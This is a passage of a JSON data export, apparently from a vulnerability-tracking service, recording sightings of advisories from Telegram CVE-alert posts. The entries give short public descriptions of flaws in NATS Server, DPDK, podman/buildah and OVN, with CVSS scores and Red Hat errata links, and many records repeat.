"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FHG8-QXH5-7Q3W", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11979", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30215\n\ud83d\udd25 CVSS Score: 9.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H)\n\ud83d\udd39 Description: NATS-Server is a High-Performance server for NATS.io, the cloud and edge native messaging system. In versions starting from 2.2.0 but prior to 2.10.27 and 2.11.1, the management of JetStream assets happens with messages in the $JS. subject namespace in the system account; this is partially exposed into regular accounts to allow account holders to manage their assets. Some of the JS API requests were missing access controls, allowing any user with JS management permissions in any account to perform certain administrative actions on any JS asset in any other account. At least one of the unprotected APIs allows for data destruction. None of the affected APIs allow disclosing stream contents. This vulnerability is fixed in v2.11.1 or v2.10.27.\n\ud83d\udccf Published: 2025-04-15T23:25:43.143Z\n\ud83d\udccf Modified: 2025-04-16T00:12:20.161Z\n\ud83d\udd17 References:\n1. https://github.com/nats-io/nats-server/security/advisories/GHSA-fhg8-qxh5-7q3w\n2. https://advisories.nats.io/CVE/secnote-2025-01.txt", "creation_timestamp": "2025-04-16T00:55:19.000000Z"}, {"uuid": "7e4f88d2-dcf1-44f0-a062-f86bd53c6dfd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:3970", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12175", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11614\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_0, Vector: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: An out-of-bounds read vulnerability was found in DPDK's Vhost library checksum offload feature. This issue enables an untrusted or compromised guest to crash the hypervisor's vSwitch by forging Virtio descriptors to cause out-of-bounds reads. This flaw allows an attacker with a malicious VM using a virtio driver to cause the vhost-user side to crash by sending a packet with a Tx checksum offload request and an invalid csum_start offset.\n\ud83d\udccf Published: 2024-12-18T08:30:49.729Z\n\ud83d\udccf Modified: 2025-04-17T00:31:34.768Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0208\n2. https://access.redhat.com/errata/RHSA-2025:0209\n3. https://access.redhat.com/errata/RHSA-2025:0210\n4. https://access.redhat.com/errata/RHSA-2025:0211\n5. https://access.redhat.com/errata/RHSA-2025:0220\n6. https://access.redhat.com/errata/RHSA-2025:0221\n7. https://access.redhat.com/errata/RHSA-2025:0222\n8. https://access.redhat.com/errata/RHSA-2025:3963\n9. https://access.redhat.com/errata/RHSA-2025:3964\n10. https://access.redhat.com/errata/RHSA-2025:3965\n11. https://access.redhat.com/errata/RHSA-2025:3970\n12. https://access.redhat.com/security/cve/CVE-2024-11614\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2327955", "creation_timestamp": "2025-04-17T00:59:45.000000Z"}, {"uuid": "f1fe368d-a4c5-462b-8086-a7184950f646", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6C8H-W3J5-J293", "type": "published-proof-of-concept", "source": "Telegram/i8bForBP1dZBDut81Rl3-X-SxUGQomBUf7AnX6qGlfBFF0o", "content": "", "creation_timestamp": "2026-01-07T21:06:23.000000Z"}, {"uuid": "db4a50d2-8e7a-4bf3-928f-fb5bb82cf519", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1914", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12130", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-04-16T18:43:10.993Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/errata/RHSA-2025:1713\n17. https://access.redhat.com/errata/RHSA-2025:1908\n18. https://access.redhat.com/errata/RHSA-2025:1910\n19. https://access.redhat.com/errata/RHSA-2025:1914\n20. https://access.redhat.com/errata/RHSA-2025:2441\n21. https://access.redhat.com/errata/RHSA-2025:2443\n22. https://access.redhat.com/errata/RHSA-2025:2454\n23. https://access.redhat.com/errata/RHSA-2025:2456\n24. https://access.redhat.com/errata/RHSA-2025:2701\n25. https://access.redhat.com/errata/RHSA-2025:2703\n26. https://access.redhat.com/errata/RHSA-2025:2710\n27. https://access.redhat.com/errata/RHSA-2025:2712\n28. https://access.redhat.com/errata/RHSA-2025:3577\n29. https://access.redhat.com/errata/RHSA-2025:3798\n30. https://access.redhat.com/security/cve/CVE-2024-11218\n31. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-04-16T18:56:07.000000Z"}, {"uuid": "c163c6a4-3050-4b4d-90a1-1ce01201f994", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2701", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12130", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-04-16T18:43:10.993Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/errata/RHSA-2025:1713\n17. https://access.redhat.com/errata/RHSA-2025:1908\n18. https://access.redhat.com/errata/RHSA-2025:1910\n19. https://access.redhat.com/errata/RHSA-2025:1914\n20. https://access.redhat.com/errata/RHSA-2025:2441\n21. https://access.redhat.com/errata/RHSA-2025:2443\n22. https://access.redhat.com/errata/RHSA-2025:2454\n23. https://access.redhat.com/errata/RHSA-2025:2456\n24. https://access.redhat.com/errata/RHSA-2025:2701\n25. https://access.redhat.com/errata/RHSA-2025:2703\n26. https://access.redhat.com/errata/RHSA-2025:2710\n27. https://access.redhat.com/errata/RHSA-2025:2712\n28. https://access.redhat.com/errata/RHSA-2025:3577\n29. https://access.redhat.com/errata/RHSA-2025:3798\n30. https://access.redhat.com/security/cve/CVE-2024-11218\n31. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-04-16T18:56:07.000000Z"}, {"uuid": "8a3700b9-ccae-4d4c-8d25-04e376a4afd4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1390", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11857", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-2182\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the Open Virtual Network (OVN). In OVN clusters where BFD is used between hypervisors for high availability, an attacker can inject specially crafted BFD packets from inside unprivileged workloads, including virtual machines or containers, that can trigger a denial of service.\n\ud83d\udccf Published: 2024-03-12T16:18:31.829Z\n\ud83d\udccf Modified: 2025-04-15T15:26:18.815Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1385\n2. https://access.redhat.com/errata/RHSA-2024:1386\n3. https://access.redhat.com/errata/RHSA-2024:1387\n4. https://access.redhat.com/errata/RHSA-2024:1388\n5. https://access.redhat.com/errata/RHSA-2024:1390\n6. https://access.redhat.com/errata/RHSA-2024:1391\n7. https://access.redhat.com/errata/RHSA-2024:1392\n8. https://access.redhat.com/errata/RHSA-2024:1393\n9. https://access.redhat.com/errata/RHSA-2024:1394\n10. https://access.redhat.com/errata/RHSA-2024:4035\n11. https://access.redhat.com/security/cve/CVE-2024-2182\n12. https://bugzilla.redhat.com/show_bug.cgi?id=2267840\n13. https://mail.openvswitch.org/pipermail/ovs-announce/2024-March/000346.html\n14. https://www.openwall.com/lists/oss-security/2024/03/12/5", "creation_timestamp": "2025-04-15T15:54:53.000000Z"}, {"uuid": "67a8ecc8-704b-4dbe-82f2-47a9fe7f14b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1394", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11857", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-2182\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the Open Virtual Network (OVN). In OVN clusters where BFD is used between hypervisors for high availability, an attacker can inject specially crafted BFD packets from inside unprivileged workloads, including virtual machines or containers, that can trigger a denial of service.\n\ud83d\udccf Published: 2024-03-12T16:18:31.829Z\n\ud83d\udccf Modified: 2025-04-15T15:26:18.815Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1385\n2. https://access.redhat.com/errata/RHSA-2024:1386\n3. https://access.redhat.com/errata/RHSA-2024:1387\n4. https://access.redhat.com/errata/RHSA-2024:1388\n5. https://access.redhat.com/errata/RHSA-2024:1390\n6. https://access.redhat.com/errata/RHSA-2024:1391\n7. https://access.redhat.com/errata/RHSA-2024:1392\n8. https://access.redhat.com/errata/RHSA-2024:1393\n9. https://access.redhat.com/errata/RHSA-2024:1394\n10. https://access.redhat.com/errata/RHSA-2024:4035\n11. https://access.redhat.com/security/cve/CVE-2024-2182\n12. https://bugzilla.redhat.com/show_bug.cgi?id=2267840\n13. https://mail.openvswitch.org/pipermail/ovs-announce/2024-March/000346.html\n14. https://www.openwall.com/lists/oss-security/2024/03/12/5", "creation_timestamp": "2025-04-15T15:54:53.000000Z"}, {"uuid": "38244479-8843-4e81-b325-20faef90ce2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6RG3-8H8X-5XFV", "type": "seen", "source": "Telegram/FJ91h9lPE8_NrOna6J3eXbdgNu_7kG7N3xSTsyqueKOhNyw9", "content": "", "creation_timestamp": "2025-02-21T22:10:24.000000Z"}, {"uuid": "2c3a8d3c-c87f-4bcb-9871-15db7a0ee567", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V4QQ-V3C3-X62X", "type": "seen", "source": "Telegram/jO7QlYrwcf3hjfx3ScBgpS7153MfwFyypIrzpKferFw0p6I", "content": "", "creation_timestamp": "2026-01-07T22:11:38.000000Z"}, {"uuid": "5baddfff-722b-4993-a3c1-5d4403a296a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2703", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12130", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-04-16T18:43:10.993Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/errata/RHSA-2025:1713\n17. https://access.redhat.com/errata/RHSA-2025:1908\n18. https://access.redhat.com/errata/RHSA-2025:1910\n19. https://access.redhat.com/errata/RHSA-2025:1914\n20. https://access.redhat.com/errata/RHSA-2025:2441\n21. https://access.redhat.com/errata/RHSA-2025:2443\n22. https://access.redhat.com/errata/RHSA-2025:2454\n23. https://access.redhat.com/errata/RHSA-2025:2456\n24. https://access.redhat.com/errata/RHSA-2025:2701\n25. https://access.redhat.com/errata/RHSA-2025:2703\n26. https://access.redhat.com/errata/RHSA-2025:2710\n27. https://access.redhat.com/errata/RHSA-2025:2712\n28. https://access.redhat.com/errata/RHSA-2025:3577\n29. https://access.redhat.com/errata/RHSA-2025:3798\n30. https://access.redhat.com/security/cve/CVE-2024-11218\n31. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-04-16T18:56:07.000000Z"}, {"uuid": "8676fca9-35bb-4c5c-913f-010e3f937e87", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0922", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12130", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-04-16T18:43:10.993Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/errata/RHSA-2025:1713\n17. https://access.redhat.com/errata/RHSA-2025:1908\n18. https://access.redhat.com/errata/RHSA-2025:1910\n19. https://access.redhat.com/errata/RHSA-2025:1914\n20. https://access.redhat.com/errata/RHSA-2025:2441\n21. https://access.redhat.com/errata/RHSA-2025:2443\n22. https://access.redhat.com/errata/RHSA-2025:2454\n23. https://access.redhat.com/errata/RHSA-2025:2456\n24. https://access.redhat.com/errata/RHSA-2025:2701\n25. https://access.redhat.com/errata/RHSA-2025:2703\n26. https://access.redhat.com/errata/RHSA-2025:2710\n27. https://access.redhat.com/errata/RHSA-2025:2712\n28. https://access.redhat.com/errata/RHSA-2025:3577\n29. https://access.redhat.com/errata/RHSA-2025:3798\n30. https://access.redhat.com/security/cve/CVE-2024-11218\n31. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-04-16T18:56:07.000000Z"}, {"uuid": "9fc6ebc4-bcde-471f-911e-525d8658fbe1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PQ29-69JG-9MXC", "type": "seen", "source": "Telegram/jO7QlYrwcf3hjfx3ScBgpS7153MfwFyypIrzpKferFw0p6I", "content": "", "creation_timestamp": "2026-01-07T22:11:38.000000Z"}, {"uuid": "5621b4d0-304a-40b9-8dad-ec02d2d7b3c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1188", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12130", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-04-16T18:43:10.993Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/errata/RHSA-2025:1713\n17. https://access.redhat.com/errata/RHSA-2025:1908\n18. https://access.redhat.com/errata/RHSA-2025:1910\n19. https://access.redhat.com/errata/RHSA-2025:1914\n20. https://access.redhat.com/errata/RHSA-2025:2441\n21. https://access.redhat.com/errata/RHSA-2025:2443\n22. https://access.redhat.com/errata/RHSA-2025:2454\n23. https://access.redhat.com/errata/RHSA-2025:2456\n24. https://access.redhat.com/errata/RHSA-2025:2701\n25. https://access.redhat.com/errata/RHSA-2025:2703\n26. https://access.redhat.com/errata/RHSA-2025:2710\n27. https://access.redhat.com/errata/RHSA-2025:2712\n28. https://access.redhat.com/errata/RHSA-2025:3577\n29. https://access.redhat.com/errata/RHSA-2025:3798\n30. https://access.redhat.com/security/cve/CVE-2024-11218\n31. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-04-16T18:56:07.000000Z"}, {"uuid": "665107b3-06d7-42e7-aa4b-4e8241f72a78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XCMF-RPMH-HG59", "type": "seen", "source": "Telegram/jO7QlYrwcf3hjfx3ScBgpS7153MfwFyypIrzpKferFw0p6I", "content": "", "creation_timestamp": "2026-01-07T22:11:38.000000Z"}, {"uuid": "f2c8a150-a504-46e2-9e0e-c2918adb305d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JQ9M-54GR-C56C", "type": "seen", "source": "Telegram/jO7QlYrwcf3hjfx3ScBgpS7153MfwFyypIrzpKferFw0p6I", "content": "", "creation_timestamp": "2026-01-07T22:11:38.000000Z"}, {"uuid": "84c75da7-e912-4543-b725-44e5c642a8c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2443", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12130", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-04-16T18:43:10.993Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/errata/RHSA-2025:1713\n17. https://access.redhat.com/errata/RHSA-2025:1908\n18. https://access.redhat.com/errata/RHSA-2025:1910\n19. https://access.redhat.com/errata/RHSA-2025:1914\n20. https://access.redhat.com/errata/RHSA-2025:2441\n21. https://access.redhat.com/errata/RHSA-2025:2443\n22. https://access.redhat.com/errata/RHSA-2025:2454\n23. https://access.redhat.com/errata/RHSA-2025:2456\n24. https://access.redhat.com/errata/RHSA-2025:2701\n25. https://access.redhat.com/errata/RHSA-2025:2703\n26. https://access.redhat.com/errata/RHSA-2025:2710\n27. https://access.redhat.com/errata/RHSA-2025:2712\n28. https://access.redhat.com/errata/RHSA-2025:3577\n29. https://access.redhat.com/errata/RHSA-2025:3798\n30. https://access.redhat.com/security/cve/CVE-2024-11218\n31. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-04-16T18:56:07.000000Z"}, {"uuid": "fd11641c-a688-4d82-ac7a-516d9bf97e4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1187", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12130", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-04-16T18:43:10.993Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/errata/RHSA-2025:1713\n17. https://access.redhat.com/errata/RHSA-2025:1908\n18. https://access.redhat.com/errata/RHSA-2025:1910\n19. https://access.redhat.com/errata/RHSA-2025:1914\n20. https://access.redhat.com/errata/RHSA-2025:2441\n21. https://access.redhat.com/errata/RHSA-2025:2443\n22. https://access.redhat.com/errata/RHSA-2025:2454\n23. https://access.redhat.com/errata/RHSA-2025:2456\n24. https://access.redhat.com/errata/RHSA-2025:2701\n25. https://access.redhat.com/errata/RHSA-2025:2703\n26. https://access.redhat.com/errata/RHSA-2025:2710\n27. https://access.redhat.com/errata/RHSA-2025:2712\n28. https://access.redhat.com/errata/RHSA-2025:3577\n29. https://access.redhat.com/errata/RHSA-2025:3798\n30. https://access.redhat.com/security/cve/CVE-2024-11218\n31. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-04-16T18:56:07.000000Z"}, {"uuid": "e871b380-52ed-4f59-b1c7-eecf832e9770", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1453", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12130", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-04-16T18:43:10.993Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. 